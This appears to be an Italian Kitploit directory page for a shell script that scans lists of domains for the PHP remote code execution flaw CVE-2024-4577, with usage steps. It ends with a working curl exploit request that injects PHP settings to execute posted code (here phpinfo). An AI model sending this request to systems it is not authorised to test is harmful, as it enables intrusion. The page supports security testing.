Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-4577 — Script shell per scansionare domini per la vulnerabilità di esecuzione remota di codice CVE-2024-4577 in PHP tramite richieste POST appositamente create, esportando i target vulnerabili per la verifica manuale. | Kitploit
Strumenti/GitHubGitHub/graphite-org/cve-2024-4577
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubgraphite-org/cve-2024-4577

CVE-2024-4577

Script shell per scansionare domini per la vulnerabilità di esecuzione remota di codice CVE-2024-4577 in PHP tramite richieste POST appositamente create, esportando i target vulnerabili per la verifica manuale.

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Checker di vulnerabilità CVE-2024-4577

Questo script è progettato per verificare la vulnerabilità descritta da CVE-2024-4577, che prevede lo sfruttamento di alcune configurazioni PHP per eseguire codice arbitrario da remoto. Invia una richiesta POST a endpoint specificati su un elenco di domini e controlla se la risposta indica una vulnerabilità.

Utilizzo

  1. Installa GNU Parallel:

    root@kitploit:~
    sudo apt-get install parallel
    
  2. Clona il repository: Clona questo repository sulla tua macchina locale usando Git:

    root@kitploit:~
    git clone https://github.com/Yukiioz/CVE-2024-4577.git
    
  3. Naviga nel repository: Entra nella directory clonata:

    root@kitploit:~
    cd CVE-2024-4577
    
  4. Prepara l'elenco dei domini: Crea un file di testo contenente un elenco di domini da verificare. Ogni dominio deve essere su una nuova riga. Ad esempio:

    root@kitploit:~
    https://example1.com
    https://example2.com
    https://example3.com
    
  5. Esegui lo script: Esegui lo script CVE-2024-4577.sh, passando il percorso del file dell'elenco dei domini come argomento:

    root@kitploit:~
    ./CVE-2024-4577.sh live-subdomains.txt | tee script.log
    
  6. Esamina l'output: Lo script mostrerà informazioni sull'avanzamento mentre controlla ogni dominio. Se un dominio viene trovato vulnerabile, verrà evidenziato in rosso. Lo script esporterà anche un elenco di domini vulnerabili in un file chiamato vulnerable_domains.txt.

File esportato: vulnerable_domains.txt

Lo script esporta un elenco di domini vulnerabili in un file chiamato vulnerable_domains.txt. Questo file contiene un semplice elenco di domini vulnerabili, con ogni dominio su una nuova riga. Per una conferma manuale aggiuntiva, usa il comando curl per inviare una richiesta POST all'endpoint di destinazione sul dominio. Sostituisci https://dev.example.com/test.php con l'endpoint effettivo sul dominio di destinazione.

root@kitploit:~
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
     -H "User-Agent: curl/8.3.0" \
     --data "<?php phpinfo(); ?>"
Scarica lo strumento